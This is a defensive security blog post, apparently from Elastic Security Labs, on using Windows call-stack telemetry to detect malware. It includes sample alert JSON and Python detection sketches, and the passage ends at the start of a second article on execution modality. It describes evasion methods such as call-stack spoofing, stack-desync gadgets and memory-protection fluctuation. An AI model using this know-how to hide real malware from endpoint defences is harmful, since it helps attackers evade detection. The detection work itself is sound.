Elastic Security Labs - Articles by John Uhlmann

Call Stacks: No More Free Passes For Malware

Thu, 12 Jun 2025 00:00:00 GMT

Call stacks provide the who

One of Elastic’s key Windows endpoint telemetry differentiators is call stacks.

Most detections rely on what is happening, and this is often insufficient because most behaviours are dual-purpose. With call stacks, we add the fine-grained ability to also determine who is performing the activity. This combination gives us an unparalleled ability to uncover malicious activity. By feeding this deep telemetry to Elastic Defend’s on-host rule engine, we can quickly respond to emerging threats.

Call stacks are a beautiful lie

In computer science, a stack is a last-in, first-out data structure. Similar to a stack of physical items, it is only possible to add or remove the top element. A call stack is a stack that contains information about the currently active subroutine calls.

On x64 hosts, this call stack can only be accurately generated using execution tracing features on the CPU, such as Intel LBR, Intel BTS, Intel AET, Intel IPT, and x64 Architectural LBR. These tracing features were designed for performance profiling and debugging purposes, but can be used in some security scenarios as well. However, what is more generally available is an approximate call stack that is recovered from a thread’s data stack via a mechanism called stack walking.

In the x64 architecture, the “stack pointer register” (rsp) unsurprisingly points to a stack data structure, and there are efficient instructions to read and write the data on this stack. Additionally, the call instruction transfers control to a new subroutine but also saves a return address at the memory address referenced by the stack pointer. A ret instruction will later retrieve this saved address so that execution can return to where it left off. Functions in most programming languages are typically implemented using these two instructions, and both function parameters and local function variables will typically be allocated on this stack for performance. The portion of the stack related to a single function is called a stack frame.

Stack walking is the recovery of just the return addresses from the heterogeneous data stored on the thread stack. Return addresses need to be stored somewhere for control flow, so stack walking co-opts this existing data to approximate a call stack. This is entirely suitable for most debugging and performance profiling scenarios, but slightly less helpful for security auditing. The main issue is that you can’t disassemble backwards. You can always determine the return address for a given call site, but not the converse. The best approach you can take is to check each of the 15 possible preceding instruction lengths (x64 instructions are at most 15 bytes long) and see which disassembles to exactly one call instruction. Even then, all you have recovered is a previous call site, not necessarily the exact preceding call site. This is because most compilers use tail call optimisation to omit unnecessary stack frames. For security, this creates annoying scenarios. For example, there is no guarantee that the Win32StartAddress function will be on the stack even though it was called.
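The length check described above can be sketched in Python. This is a simplified illustration, not Elastic's implementation. Instead of a full x64 disassembler, it recognises only near CALL encodings: E8 rel32, and FF /2 with at most one REX prefix and no other prefixes. It also assumes that `leading` holds the bytes immediately before a return address, which is what the callsite_leading_bytes fields in the examples below appear to contain.

```python
from __future__ import annotations


def _ff_call_length(insn: bytes) -> int | None:
    """Length of an FF /2 (indirect near CALL) encoding starting at insn[0], or None.

    Simplified: accounts for ModRM, SIB and displacement bytes, but no legacy prefixes.
    """
    if len(insn) < 2 or insn[0] != 0xFF:
        return None
    modrm = insn[1]
    mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
    if reg != 2:  # FF /4 is JMP, FF /6 is PUSH, and so on
        return None
    length = 2  # opcode + ModRM
    if mod == 3:  # register operand, e.g. call rsi (FF D6)
        return length
    if rm == 4:  # a SIB byte follows the ModRM byte
        if len(insn) < 3:
            return None
        length += 1
        if mod == 0 and (insn[2] & 7) == 5:  # SIB without a base register -> disp32
            length += 4
    elif mod == 0 and rm == 5:  # RIP-relative, e.g. call [rip+disp32] (FF 15)
        length += 4
    if mod == 1:
        length += 1  # disp8
    elif mod == 2:
        length += 4  # disp32
    return length


def candidate_call_lengths(leading: bytes) -> list[int]:
    """Lengths n (2..15) for which the last n bytes before a return address decode
    as exactly one near CALL (E8 rel32 or FF /2), optionally with one REX prefix."""
    candidates = []
    for n in range(2, min(15, len(leading)) + 1):
        insn = leading[-n:]
        body = insn[1:] if 0x40 <= insn[0] <= 0x4F else insn  # drop a single REX prefix
        if len(body) == 5 and body[0] == 0xE8:
            candidates.append(n)
        elif _ff_call_length(body) == len(body):
            candidates.append(n)
    return candidates
```

Take the bytes 48 ff 15 d9 b2 1b 00 from the SilentMoonwalk example below. They yield [6, 7], because the same call [rip+disp32] decodes both with and without its REX prefix. By contrast, the jmp r9 (41 ff e1) that ends the leading bytes in the APC example yields no candidate at all.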

So what we usually refer to as a call stack is actually a return address stack.

Malware authors use this ambiguity to lie. They either craft trampoline stack frames through legitimate modules to hide calls originating from malicious code, or they coerce stack walking into predicting different return addresses than those the CPU will execute. Of course, malware has always just been an attempt to lie, and antimalware is just the process of exposing that lie.

“... but at the length truth will out.” - William Shakespeare, The Merchant of Venice, Act 2, Scene 2

Making call stacks beautiful

So far, a stack walk is just a list of numeric memory addresses. To make these addresses useful for analysis, we need to enrich them with context. (Note: we don’t currently include kernel stack frames.)

The minimum useful enrichment is to convert these addresses into offsets within modules (e.g. ntdll.dll+0x15c9c4). This would only catch the most egregious malware though — we can go deeper. The most important modules on Windows are those that implement the Native and Win32 APIs. The application binary interface for these APIs requires that the name of each function be included in the Export Directory of the containing module. This is the information that Elastic currently uses to enrich its endpoint call stacks.

A more accurate enrichment could be achieved by using the public symbols (if available) hosted on the vendor’s infrastructure (especially Microsoft’s). While this method offers deeper fidelity, it comes with higher operational costs and isn’t feasible for our air-gapped customers.

A rule of thumb for Microsoft kernel and native symbols is that the exported interface of each component has a capitalised prefix such as Ldr, Tp or Rtl. Private functions extend this prefix with a p. By default, private functions with external linkage are included in the public symbol table. A very large offset might indicate a very large function, but it could also just indicate an unnamed function that you don’t have symbols for. A general guideline would be to consider any triple-digit and larger offsets in an exported function as likely belonging to another function.

Call Stack	Stack Walk	Stack Walk Modules	Stack Walk Exports (Elastic approach)	Stack Walk Public Symbols
0x7ffb8eb9c9c2	0x7ffb8eb9c9c4	ntdll.dll+0x15c9c4	ntdll.dll!NtProtectVirtualMemory+0x14	ntdll.dll!NtProtectVirtualMemory+0x14
0x12d383f0046	0x7ffb8c3c71d6	kernelbase.dll+0xc71d6	kernelbase.dll!VirtualProtect+0x36	kernelbase.dll!VirtualProtect+0x36
0x7ffb8eb1a9d8	0x7ffb8eb1a9ed	ntdll.dll+0xda9ed	ntdll.dll!RtlAddRefActivationContext+0x40d	ntdll.dll!RtlTpTimerCallback+0x7d
0x7ffb8eb1aaf4	0x7ffb8eb1aaf9	ntdll.dll+0xdaaf9	ntdll.dll!RtlAddRefActivationContext+0x519	ntdll.dll!TppTimerpExecuteCallback+0xa9
0x7ffb8ea535ff	0x7ffb8ea53604	ntdll.dll+0x13604	ntdll.dll!RtlAcquireSRWLockExclusive+0x974	ntdll.dll!TppWorkerThread+0x644
0x7ffb8da5e8cf	0x7ffb8da5e8d4	kernel32.dll+0x2e8d4	kernel32.dll!BaseThreadInitThunk+0x14	kernel32.dll!BaseThreadInitThunk+0x14
0x7ffb8eaf14eb	0x7ffb8eaf14f1	ntdll.dll+0xb14f1	ntdll.dll!RtlUserThreadStart+0x21	ntdll.dll!RtlUserThreadStart+0x21

Comparison of Call Stack Enrichment Levels
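The following Python sketch illustrates the difference between the module and export enrichment levels. It resolves raw return addresses against a tiny, hard-coded module list. The module bases and export RVAs are back-derived from the example table above (for example, ntdll.dll at 0x7ffb8ea40000), and the module sizes are hypothetical placeholders. A real implementation would read both from the loaded module list and from each module's Export Directory. The 0x100 threshold simply encodes the text's rule of thumb about triple-digit offsets.

```python
from __future__ import annotations

from bisect import bisect_right

# (name, base, size, {export RVA: export name}). Bases and RVAs are back-derived
# from the example table; sizes are hypothetical placeholders.
MODULES = [
    ("kernelbase.dll", 0x7FFB8C300000, 0x2F0000, {0xC71A0: "VirtualProtect"}),
    ("kernel32.dll", 0x7FFB8DA30000, 0xC0000, {0x2E8C0: "BaseThreadInitThunk"}),
    ("ntdll.dll", 0x7FFB8EA40000, 0x200000, {
        0x12C90: "RtlAcquireSRWLockExclusive",
        0xB14D0: "RtlUserThreadStart",
        0xDA5E0: "RtlAddRefActivationContext",
        0x15C9B0: "NtProtectVirtualMemory",
    }),
]
LARGE_OFFSET = 0x100  # "triple-digit" offsets likely belong to an unexported function


def enrich(address: int) -> tuple[str, str, bool]:
    """Return (module+offset, export+offset, offset_looks_wrong) for one return address."""
    for name, base, size, exports in MODULES:
        if base <= address < base + size:
            rva = address - base
            module_form = f"{name}+{rva:#x}"
            rvas = sorted(exports)
            i = bisect_right(rvas, rva)  # number of exports at or below this RVA
            if i == 0:
                return module_form, module_form, False
            start = rvas[i - 1]  # nearest preceding export
            delta = rva - start
            return module_form, f"{name}!{exports[start]}+{delta:#x}", delta >= LARGE_OFFSET
    return hex(address), hex(address), False  # not inside any module, e.g. unbacked memory
```

When run over the Stack Walk column, it reproduces the exports column. That includes the misleading RtlAddRefActivationContext+0x40d, which the offset check flags.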

In the above example, the shellcode at 0x12d383f0000 deliberately used a tail call so that its address wouldn’t appear in the stack walk. This lie-by-omission is apparent even with only the stack walk. Elastic reports this with the proxy_call heuristic, because the malware registered a timer callback function to proxy the call to VirtualProtect from a different thread.

Making call stacks powerful

The call stacks of the system calls that we monitor with Event Tracing for Windows (ETW) have an expected structure. At the bottom of the stack is the thread StartAddress - typically ntdll.dll!RtlUserThreadStart. This is followed by the Win32 API thread entry - kernel32.dll!BaseThreadInitThunk and then the first user module. A user module is application code that is not part of the Win32 (or Native) API. This first user module should match the thread’s Win32StartAddress (unless that function used a tail call). More user modules will follow until the final user module makes a call into a Win32 API that makes a Native API call, which finally results in a system call to the kernel.

From a detection standpoint, the most important module in this call stack is the final user module. Elastic shows this module, including its hash and any code signatures. These details aid in alert triage, but more importantly, they drastically improve the granularity at which we can baseline the behaviours of legitimate software that sometimes behaves like malware. The more accurately we can baseline normal, the harder it is for malware to blend in.

{
  "process.thread.Ext": {
    "call_stack_summary": "ntdll.dll|kernelbase.dll|file.dll|rundll32.exe|kernel32.dll|ntdll.dll",
    "call_stack": [
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!NtAllocateVirtualMemory+0x14" }, /* Native API */
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!VirtualAllocExNuma+0x62" }, /* Win32 API */
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!VirtualAllocEx+0x16" }, /* Win32 API */
      {
        "symbol_info": "c:\\users\\user\\desktop\\file.dll+0x160d8b", /* final user module */
        "callsite_trailing_bytes": "488bf0488d4d88e8197ee2ff488bc64883c4685b5e5f415c415d415e415f5dc390909090905541574156415541545756534883ec58488dac2490000000488b71",
        "callsite_leading_bytes": "088b4d38894c2420488bca48894db8498bd0488955b0458bc1448945c4448b4d3044894dc0488d4d88e8e77de2ff488b4db8488b55b0448b45c4448b4dc0ffd6"
      },
      { "symbol_info": "c:\\users\\user\\desktop\\file.dll+0x7b429" },
      { "symbol_info": "c:\\users\\user\\desktop\\file.dll+0x44a9" },
      { "symbol_info": "c:\\users\\user\\desktop\\file.dll+0x5f58" },
      { "symbol_info": "c:\\windows\\system32\\rundll32.exe+0x3bcf" },
      { "symbol_info": "c:\\windows\\system32\\rundll32.exe+0x6309" }, /* first user module - typically the ETHREAD.Win32StartAddress module */
      { "symbol_info": "c:\\windows\\system32\\kernel32.dll!BaseThreadInitThunk+0x14" }, /* Win32 API */
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!RtlUserThreadStart+0x21" } /* Native API - the ETHREAD.StartAddress module */
    ],
    "call_stack_final_user_module": {
      "path": "c:\\users\\user\\desktop\\file.dll",
      "code_signature": [ { "exists": false } ],
      "name": "file.dll",
      "hash": { "sha256": "0240cc89d4a76bafa9dcdccd831a263bf715af53e46cac0b0abca8116122d242" }
    }
  }
}

Sample enriched call stack
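The call_stack_summary and final user module fields can be approximated from the symbol_info strings alone. This Python sketch assumes a hypothetical, hard-coded set of "API modules" (ntdll, win32u, kernelbase, kernel32 and user32). Walking from the top of the stack, it treats the first frame outside that set as the final user module. It ignores the protection and provenance refinements described below, so it will not reproduce every "Undetermined" verdict.

```python
from __future__ import annotations

import ntpath

# Assumption for this sketch: modules treated as the Native/Win32 API layer.
API_MODULES = {"ntdll.dll", "win32u.dll", "kernelbase.dll", "kernel32.dll", "user32.dll"}


def module_path(symbol_info: str) -> str:
    """Strip '!Export+0x..' or '+0x..' from a symbol_info string."""
    return symbol_info.split("!", 1)[0].rsplit("+", 1)[0]


def module_name(symbol_info: str) -> str:
    return ntpath.basename(module_path(symbol_info)).lower()


def call_stack_summary(call_stack: list[dict]) -> str:
    """Module names from the top of the stack down, collapsing consecutive repeats."""
    names: list[str] = []
    for frame in call_stack:
        name = module_name(frame["symbol_info"])
        if not names or names[-1] != name:
            names.append(name)
    return "|".join(names)


def final_user_module(call_stack: list[dict]) -> dict:
    """First frame (from the top) outside the API layer, else 'Undetermined'."""
    for frame in call_stack:
        if module_name(frame["symbol_info"]) not in API_MODULES:
            path = module_path(frame["symbol_info"])
            return {"name": ntpath.basename(path), "path": path}
    return {"name": "Undetermined", "reason": call_stack_summary(call_stack)}
```

Given the SilentMoonwalk frames later in this post, it returns "Undetermined" with the reason ntdll.dll|kernelbase.dll|kernel32.dll|ntdll.dll, matching that example.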

Call stack final user module enrichments:

name	The file name of the call_stack_final_user_module. Can also be "Unbacked" indicating private executable memory, or "Undetermined" indicating a suspicious call stack.
path	The file path of the call_stack_final_user_module.
hash.sha256	The sha256 of the call_stack_final_user_module, or the protection_provenance module if any.
code_signature	Code signature of the call_stack_final_user_module, or the protection_provenance module if any.
allocation_private_bytes	The number of bytes in this memory region that are both +X and non-shareable. Non-zero values can indicate code hooking, patching, or hollowing.
protection	The memory protection for the acting region of pages is included if it is not RX. Corresponds to MEMORY_BASIC_INFORMATION.Protect.
protection_provenance	The name of the memory region that caused the last modification of the protection of this page. "Unbacked" may indicate shellcode.
protection_provenance_path	The path of the module that caused the last modification of the protection of this page.
reason	The anomalous call_stack_summary that led to an "Undetermined" protection_provenance.

A quick call stack glossary

When examining call stacks, there are some Native API functions that are helpful to be familiar with. Ken Johnson, now of Microsoft, has provided us with a catalog of NTDLL kernel mode to user mode callbacks to get us started. Seriously, you should pause here and go read that first.

We met RtlUserThreadStart earlier. Both it and its sibling RtlUserFiberStart should only ever appear at the bottom of a call stack. These are the entrypoints for user threads and fibers, respectively. However, the first user-mode code executed on every thread is actually LdrInitializeThunk. After performing the user-mode component of thread initialisation (and process initialisation, if required), this function transfers control to the entrypoint via NtContinue, which updates the instruction pointer directly. This means that LdrInitializeThunk does not appear in any later stack walks.

So if you see a call stack that includes LdrInitializeThunk then this means you are at the very start of a thread’s execution. This is where the application compatibility Shim Engine operates, where hook-based security products prefer to install themselves, and where malware tries to gain execution before those other security products. Marcus Hutchins and Guido Miggelenbrink have both written excellent blogs on this topic. This startup race does not exist for security products that utilise kernel ETW for telemetry.

{
  "process.thread.Ext": {
    "call_stack_summary": "ntdll.dll|file.exe|ntdll.dll",
    "call_stack": [
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!ZwProtectVirtualMemory+0x14" },
      { "symbol_info": "c:\\users\\user\\desktop\\file.exe+0x1bac8" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!RtlAnsiStringToUnicodeString+0x3cb" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!LdrInitShimEngineDynamic+0x394d" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!LdrInitializeThunk+0x1db" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!LdrInitializeThunk+0x63" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!LdrInitializeThunk+0xe" }
    ],
    "call_stack_final_user_module": {
      "path": "c:\\users\\user\\desktop\\file.exe",
      "code_signature": [ { "exists": false } ],
      "name": "file.exe",
      "hash": { "sha256": "a59a7b56f695845ce185ddc5210bcabce1fff909bac3842c2fb325c60db15df7" }
    }
  }
}

Pre-entrypoint execution example

The next pair is KiUserExceptionDispatcher and KiRaiseUserExceptionDispatcher. The kernel uses the former to pass execution to a registered user-mode structured exception handler after a user-mode exception condition has occurred. The latter also raises an exception, but on behalf of the kernel instead. This second variant is usually only caught by debuggers, including Application Verifier, and helps identify when user-mode code is not sufficiently checking return codes from syscalls. These functions usually appear in call stacks related to application-specific crash handling or Windows Error Reporting. However, malware sometimes uses exception dispatch as a pseudo-breakpoint. For example, it may fluctuate memory protections to re-hide its shellcode immediately after making a system call.

{
  "process.thread.Ext": {
    "call_stack_summary": "ntdll.dll|file.exe|ntdll.dll|file.exe|kernel32.dll|ntdll.dll",
    "call_stack": [
      {
        "symbol_info": "c:\\windows\\system32\\ntdll.dll!ZwProtectVirtualMemory+0x14",
        "protection_provenance": "file.exe", /* another vendor's hooks were unhooked */
        "allocation_private_bytes": 8192
      },
      { "symbol_info": "c:\\users\\user\\desktop\\file.exe+0xd99c" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!RtlInitializeCriticalSectionAndSpinCount+0x1c6" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!RtlWalkFrameChain+0x1119" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!KiUserExceptionDispatcher+0x2e" },
      { "symbol_info": "c:\\users\\user\\desktop\\file.exe+0x12612" },
      { "symbol_info": "c:\\windows\\system32\\kernel32.dll!BaseThreadInitThunk+0x14" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!RtlUserThreadStart+0x21" }
    ],
    "call_stack_final_user_module": {
      "name": "file.exe",
      "path": "c:\\users\\user\\desktop\\file.exe",
      "code_signature": [ { "exists": false }],
      "hash":   { "sha256": "0e5a62c0bd9f4596501032700bb528646d6810b16d785498f23ef81c18683c74" }
    }
  }
}

Protection fluctuation via exception handler example

Next is KiUserApcDispatcher, which is used to deliver user APCs. These are one of the favourite tools of malware authors, as Microsoft provides only limited visibility into their use.

{
  "process.thread.Ext": {
    "call_stack_summary": "ntdll.dll|kernelbase.dll|ntdll.dll|kernelbase.dll|file.exe",
    "call_stack": [
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!NtProtectVirtualMemory+0x14" },
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!VirtualProtect+0x36" }, /* tail call */
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!KiUserApcDispatcher+0x2e" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!ZwDelayExecution+0x14" },
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!SleepEx+0x9e" },
      {
        "symbol_info": "c:\\users\\user\\desktop\\file.exe+0x107d",
        "allocation_private_bytes": 147456, /* stomped */
        "protection": "RW-", /* fluctuation */
        "protection_provenance": "Undetermined", /* proxied call */
        "callsite_leading_bytes": "010000004152524c8d520141524883ec284150415141baffffffff41525141ba010000004152524c8d520141524883ec284150b9ffffffffba0100000041ffe1",
        "callsite_trailing_bytes": "4883c428c3cccccccccccccccccccccccccccc894c240857b820190000e8a10c0000482be0488b052fd101004833c44889842410190000488d84243014000048"
      }
    ],
    "call_stack_final_user_module": {
      "name": "Undetermined",
      "reason": "ntdll.dll|kernelbase.dll|ntdll.dll|kernelbase.dll|file.exe"
    }
  }
}

Protection fluctuation via APC example

The Windows window manager is implemented in a kernel-mode device driver (win32k.sys). Mostly. Sometimes the window manager needs to do something from user mode, and KiUserCallbackDispatcher is the mechanism to achieve that. It’s basically a reverse syscall that targets user32.dll functions. Overwriting an entry in a process’s KernelCallbackTable is an easy way to hijack a GUI thread, so any module other than user32.dll following this call is suspicious.

Knowledge of the purpose of each of these kernel-mode to user-mode entry points greatly assists in determining if a given call stack is natural or if it has been misappropriated to achieve alternative goals.
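The glossary above can be turned into a small annotator. This Python sketch is hypothetical and does three things:
- It labels the kernel-to-user-mode entry points by export name.
- It flags RtlUserThreadStart or RtlUserFiberStart anywhere except the bottom of the stack.
- It flags any module other than user32.dll that is called from KiUserCallbackDispatcher.

It assumes exports-based symbol_info strings like those in the examples, ordered from the top of the stack.

```python
from __future__ import annotations

import ntpath

# One-line meanings of the kernel-to-user-mode entry points discussed above.
ENTRY_POINTS = {
    "LdrInitializeThunk": "start of thread execution (before the entrypoint)",
    "KiUserExceptionDispatcher": "user-mode exception dispatch",
    "KiRaiseUserExceptionDispatcher": "exception raised on behalf of the kernel",
    "KiUserApcDispatcher": "user APC delivery",
    "KiUserCallbackDispatcher": "win32k callback into user32.dll",
}
# Functions that should only ever appear at the bottom of a call stack.
STACK_BASES = {"RtlUserThreadStart", "RtlUserFiberStart"}


def split_frame(symbol_info: str) -> tuple[str, str | None]:
    """('ntdll.dll', 'KiUserApcDispatcher') from '...ntdll.dll!KiUserApcDispatcher+0x2e'."""
    module_part, _, export_part = symbol_info.partition("!")
    module = ntpath.basename(module_part.rsplit("+", 1)[0]).lower()
    return module, (export_part.split("+", 1)[0] or None)


def annotate(call_stack: list[dict]) -> list[str]:
    """Explain entry-point frames; call_stack is ordered top (most recent) first."""
    frames = [split_frame(f["symbol_info"]) for f in call_stack]
    notes: list[str] = []
    for i, (_, export) in enumerate(frames):
        if export in ENTRY_POINTS:
            notes.append(f"{export}: {ENTRY_POINTS[export]}")
        if export in STACK_BASES and i != len(frames) - 1:
            notes.append(f"{export} is not at the bottom of the stack")
        # The frame that the dispatcher called sits one entry closer to the top.
        if export == "KiUserCallbackDispatcher" and i > 0 and frames[i - 1][0] != "user32.dll":
            notes.append(f"{frames[i - 1][0]} follows KiUserCallbackDispatcher")
    return list(dict.fromkeys(notes))  # de-duplicate while keeping order
```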

Making call stacks understandable

To aid understandability, we also tag the event with various process.Ext.api.behaviors that we identify. These behaviours aren’t necessarily malicious, but they highlight aspects that are relevant to alert triage or threat hunting. For call stacks, these include:

native_api	A call was made directly to the Native API rather than the Win32 API.
direct_syscall	A syscall instruction originated outside of the Native API layer.
proxy_call	The call stack may indicate a proxied API call to mask the true source.
shellcode	Second generation executable non-image memory called a sensitive API.
image_indirect_call	An entry in the call stack was preceded by a call to a dynamically resolved function.
image_rop	No call instruction preceded an entry in the call stack.
image_rwx	An entry in the call stack is writable. Code should be read-only.
unbacked_rwx	An entry in the call stack is non-image and writable. Even JIT code should be read-only.
truncated_stack	The call stack seems to be unexpectedly truncated. This may be due to malicious tampering.
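Three of these behaviours can be roughly approximated from symbol_info strings alone. The Python sketch below is not Elastic's implementation, and its module sets are assumptions. It simplifies each behaviour as follows:
- native_api: the first caller of the syscall stub is not a Win32 API module.
- direct_syscall: the top frame is not in a syscall stub module.
- truncated_stack: the bottom frame is not a known thread start.

```python
from __future__ import annotations

import ntpath

# Assumptions for this sketch only, not Elastic's actual module lists.
SYSCALL_STUB_MODULES = {"ntdll.dll", "win32u.dll"}
WIN32_API_MODULES = {"kernelbase.dll", "kernel32.dll", "user32.dll", "advapi32.dll"}
THREAD_BASES = {"RtlUserThreadStart", "RtlUserFiberStart", "LdrInitializeThunk"}


def split_frame(symbol_info: str) -> tuple[str, str | None]:
    """('ntdll.dll', 'NtProtectVirtualMemory') from '...ntdll.dll!NtProtectVirtualMemory+0x14'."""
    module_part, _, export_part = symbol_info.partition("!")
    module = ntpath.basename(module_part.rsplit("+", 1)[0]).lower()
    return module, (export_part.split("+", 1)[0] or None)


def call_stack_behaviors(call_stack: list[dict]) -> list[str]:
    """Approximate native_api, direct_syscall and truncated_stack (top frame first)."""
    if not call_stack:
        return ["truncated_stack"]
    frames = [split_frame(f["symbol_info"]) for f in call_stack]
    found: list[str] = []
    if frames[0][0] not in SYSCALL_STUB_MODULES:
        # The syscall returned somewhere other than a syscall stub module.
        found.append("direct_syscall")
    else:
        # The first module below the syscall stub is the one that called it.
        caller = next((m for m, _ in frames if m not in SYSCALL_STUB_MODULES), None)
        if caller is not None and caller not in WIN32_API_MODULES:
            found.append("native_api")
    if frames[-1][1] not in THREAD_BASES:
        found.append("truncated_stack")
    return found
```

With these rules, the pre-entrypoint example below yields native_api, and the APC example yields truncated_stack.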

In some contexts, these behaviours alone may be sufficient to detect malware.

Spoofing — bypass or liability?

Return address spoofing has been a staple game hacking and malware technique for many, many years. This simple trick allows injected code to borrow the reputation of a legitimate module with few consequences. The goal of deep call stack inspection and behaviour baselines is to stop giving malware this free pass.

Offensive researchers have been assisting this effort by looking into approaches for full call stack spoofing. Most notably:

Spoofing Call Stacks To Confuse EDRs by William Burgess
SilentMoonwalk: Implementing a dynamic Call Stack Spoofer by Alessandro Magnosi, Arash Parsa and Athanasios Tserpelis

SilentMoonwalk, in addition to being superb offensive research, is an excellent example of how lying can get you into twice the amount of trouble — but only if you get caught. Many Defense Evasion techniques rely on security-by-obscurity — and once exposed by researchers, they can become a liability. In this case, the research included advice on the detection opportunities introduced by the evasion attempt.

{
  "process.thread.Ext": {
    "call_stack_summary": "ntdll.dll|kernelbase.dll|kernel32.dll|ntdll.dll",
    "call_stack": [
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!NtAllocateVirtualMemory+0x14" },
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!VirtualAlloc+0x48" },
      {
        "symbol_info": "c:\\windows\\system32\\kernelbase.dll!CreatePrivateObjectSecurity+0x31",
        /* 4883c438 stack desync gadget - add rsp 0x38 */
        "callsite_trailing_bytes": "4883c438c3cccccccccccccccccccc48895c241057498bd8448bd2488bf94885c90f84660609004885db0f845d060900418bd14585c97411418bc14803c383ea",
        "callsite_leading_bytes": "cccccccccccccccccccccccccccccc4883ec38488b4424684889442428488b442460488944242048ff15d9b21b000f1f44000085c00f8830300900b801000000"
      },
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!Internal_EnumSystemLocales+0x406" },
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!SystemTimeToTzSpecificLocalTimeEx+0x2d1" },
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!WaitForMultipleObjectsEx+0x982" },
      { "symbol_info": "c:\\windows\\system32\\kernel32.dll!BaseThreadInitThunk+0x14" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!RtlUserThreadStart+0x21" }
    ],
    "call_stack_final_user_module": {
      "name": "Undetermined", /* gadget module resulted in suspicious call stack */
      "reason": "ntdll.dll|kernelbase.dll|kernel32.dll|ntdll.dll"
    }
  }
}

SilentMoonwalk call stack example
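In the example above, the desync frame returns into an add rsp, 0x38; ret sequence that no call instruction precedes. The Python check below looks for that combination, and it is only an illustration, not Elastic's detection logic. It recognises just three common call encodings (E8 rel32, FF 15 disp32 and FF D0-D7). It also assumes that the callsite_leading_bytes and callsite_trailing_bytes hex strings hold the bytes immediately before and after the return address. On its own, it would also flag other hand-built frames, such as the jmp r9 stub in the APC example earlier.

```python
from __future__ import annotations


def _ends_with_common_call(leading: bytes) -> bool:
    """Simplified: does the code before the return address end in a common CALL encoding?"""
    return (
        (len(leading) >= 5 and leading[-5] == 0xE8)  # call rel32
        or (len(leading) >= 6 and leading[-6:-4] == b"\xff\x15")  # call [rip+disp32]
        or (len(leading) >= 2 and leading[-2] == 0xFF and 0xD0 <= leading[-1] <= 0xD7)  # call reg
    )


def stack_desync_gadget(leading_hex: str, trailing_hex: str) -> int | None:
    """Return the imm8 stack adjustment if the return address lands on
    'add rsp, imm8; ret' (48 83 C4 ib C3) with no common CALL before it, else None."""
    leading = bytes.fromhex(leading_hex)
    trailing = bytes.fromhex(trailing_hex)
    is_gadget = len(trailing) >= 5 and trailing[:3] == b"\x48\x83\xc4" and trailing[4] == 0xC3
    if not is_gadget or _ends_with_common_call(leading):
        return None
    return trailing[3]
```

An add rsp; ret epilogue directly after a genuine call is normal compiler output. That is why the sketch only reports the gadget when no call precedes it.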

A standard technique for unearthing hidden artifacts is to enumerate them using multiple techniques and compare the results for discrepancies. This is how RootkitRevealer works. This approach was also used in Get-InjectedThreadEx.exe, which climbs up the thread stack as well as walking down it.

In certain circumstances, we may be able to recover a call stack in two ways. If there are discrepancies, then you will see the less reliable call stack emitted as call_stack_summary_original.

{
  "process.thread.Ext": {
    "call_stack_summary": "ntdll.dll",
    "call_stack_summary_original": "ntdll.dll|kernelbase.dll|version.dll|kernel32.dll|ntdll.dll",
    "call_stack": [
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!NtContinue+0x12" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!LdrInitializeThunk+0x13" }
    ],
    "call_stack_final_user_module": {
      "name": "Undetermined",
      "reason": "ntdll.dll"
    }
  }
}

Call Stack summary original example
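The cross-view comparison can be sketched as follows. The summary from the more reliable recovery method is kept, and the other summary is surfaced only when it disagrees. In this hypothetical sketch, the caller decides which view is more reliable. Comparing summaries rather than individual frames is also a simplification.

```python
from __future__ import annotations

import ntpath


def module_name(symbol_info: str) -> str:
    return ntpath.basename(symbol_info.split("!", 1)[0].rsplit("+", 1)[0]).lower()


def summarize(call_stack: list[str]) -> str:
    """Module names from the top of the stack down, collapsing consecutive repeats."""
    names: list[str] = []
    for frame in call_stack:
        name = module_name(frame)
        if not names or names[-1] != name:
            names.append(name)
    return "|".join(names)


def merge_views(reliable: list[str], alternative: list[str]) -> dict:
    """Report the reliable view; surface the alternative only when it disagrees."""
    event = {"call_stack": reliable, "call_stack_summary": summarize(reliable)}
    original = summarize(alternative)
    if original != event["call_stack_summary"]:
        event["call_stack_summary_original"] = original
    return event
```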

Call Stacks are for everyone

By default you will only find call stacks in our alerts, but this is configurable through advanced policy.

events.callstacks.emit_in_events	If set, call stacks will be included in regular events where they are collected. Otherwise, they are only included in events that trigger behavioral protection rules. Note that setting this may significantly increase data volumes. Default: false

Further insights into Windows call stacks are available in the following Elastic Security Labs articles:

Misbehaving Modalities: Detecting Tools, Not Techniques

Thu, 15 May 2025 00:00:00 GMT

What is Execution Modality?

Jared Atkinson, Chief Strategist at SpecterOps and prolific writer on security strategy, recently introduced the very useful concept of Execution Modality to help us reason about malware techniques, and how to robustly detect them. In short, Execution Modality describes how a malicious behaviour is executed, rather than simply defining what the behaviour does.

For example, the behaviour of interest might be Windows service creation, and the modality might be either a system utility (such as `sc.exe`), a PowerShell script, or shellcode that uses indirect syscalls to directly write to the service configuration in the Windows Registry.

Atkinson outlined that if your goal is to detect a specific technique, you want to ensure that your collection is as close as possible to the operating system’s source of truth and eliminate any modality assumptions.

Case Study: service creation modalities

